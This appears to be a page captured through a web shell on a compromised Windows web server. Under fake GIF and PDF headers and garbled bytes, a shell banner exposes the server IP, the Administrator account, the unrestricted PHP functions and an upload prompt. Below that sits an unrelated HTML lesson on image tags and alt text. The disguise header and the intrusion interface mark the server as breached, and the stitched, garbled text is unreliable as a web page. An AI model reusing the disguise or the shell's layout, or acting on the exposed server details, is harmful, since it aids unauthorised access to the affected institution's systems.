GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch5/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>MMDT1021 Chapter 5 Notes - page 8</title> <link href="chapter5p8_files/style.css" rel="stylesheet" type="text/css"></head><body> <p class="pagetitle" align="center">MMDT1021 Chapter 5 Notes - page 8 </p> <p class="sectiontitle">Inserting Images on a Page and Offering Alternate Text</p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">Adding an image</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" width="750"> <tbody><tr> <th width="600">Code</th> <th width="150">Result</th> </tr> <tr> <td width="600"><code><img src="images/world.jpg" /></code></td> <td width="150"><img src="chapter5p8_files/world.jpg" height="145" width="137"></td> </tr> </tbody></table> <p> </p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">Adding alternative text</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" width="750"> <tbody><tr> <th width="600">Code</th> <th width="150">Result</th> </tr> <tr> <td width="600"><code><img src="images/world.jpg" alt="Second Image Text" /></code></td> <td width="150"><img src="chapter5p8_files/world.jpg" alt="Second Image Text" height="145" width="137"></td> </tr> </tbody></table> <p> </p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">Adding a border</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" width="750"> <tbody><tr> <th width="600">Code</th> <th width="150">Result</th> </tr> <tr> <td width="600"><code><img src="images/world.jpg" border="5" alt="Third Image Text" /></code></td> <td width="150"><img src="chapter5p8_files/world.jpg" alt="Third Image Text" border="5" height="145" width="137"></td> </tr> </tbody></table> <p> </p> <p class="sectiontitle">Specifying Size for Speedier Viewing</p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">If you tell the browser how many pixels wide and high a picture is, the browser can then draw the page quicker.</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" width="750"> <tbody><tr> <th width="85%">Code</th> <th width="15%">Page</th> </tr> <tr> <td>Here is a page <b>without</b> the use of width= and height= attributes.</td> <td><a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p8a.htm">Result</a><br> <a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p8a.txt">Source</a></td> </tr> <tr> <td>Here is a page <b>with</b> the use of width= and height= attributes.</td> <td><a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p8b.htm">Result</a><br> <a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p8b.txt">Source</a></td> </tr> </tbody></table> </body></html>